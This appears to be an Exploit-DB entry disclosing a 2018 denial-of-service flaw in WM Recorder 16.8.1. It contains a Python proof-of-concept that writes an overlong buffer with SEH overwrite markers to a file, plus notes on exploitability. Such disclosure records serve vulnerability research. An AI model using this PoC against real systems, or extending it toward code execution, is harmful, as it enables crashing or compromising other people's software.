WM Recorder 16.8.1 - Denial of Service

vendor:

WM Recorder 16.8.1

by:

bzyo

7.8

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: WM Recorder 16.8.1

Affected Version From: 16.8.1

Affected Version To: 16.8.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wm_recorder:wm_recorder:16.8.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x86/x64, Windows 10 x64

2018

WM Recorder 16.8.1 – Denial of Service

WM Recorder 16.8.1 is vulnerable to a denial of service attack. An attacker can generate a crash.txt file containing a buffer of 429 A characters, 4 B characters, 4 C characters, and 9562 D characters. The attacker can then open the application, go to Schedule Recordings, Open Scheduler, paste the contents of the crash.txt file in Stream URL, File name and Website URL, change End Recording date to future date, turn scheduler on, and select OK. This will cause the application to crash and overwrite the EIP register.

Mitigation:

Update to the latest version of WM Recorder 16.8.1

Source

Exploit-DB raw data:

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: WM Recorder 16.8.1 - Denial of Service
# Date: 03-20-2018
# Vulnerable Software: WM Recorder 16.8.1
# Vendor Homepage: http://wmrecorder.com/home/
# Version: 16.8.1
# Software Link: http://wmrecorder.com/download/wm-recorder/
# Tested On: Windows 7 x86/x64, Windows 10 x64
#
#
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,
# change End Recording date to future date, turn scheduler on, select OK
#
# app crashes & EIP overwrite;
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh
# lots of bad chars including \x90
#

filename="crash.txt"

junk = "\x41"*429

nseh = "\x42"*4

seh = "\x43"*4

fill = "\x44"*9562

buffer = junk + nseh + seh + fill
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()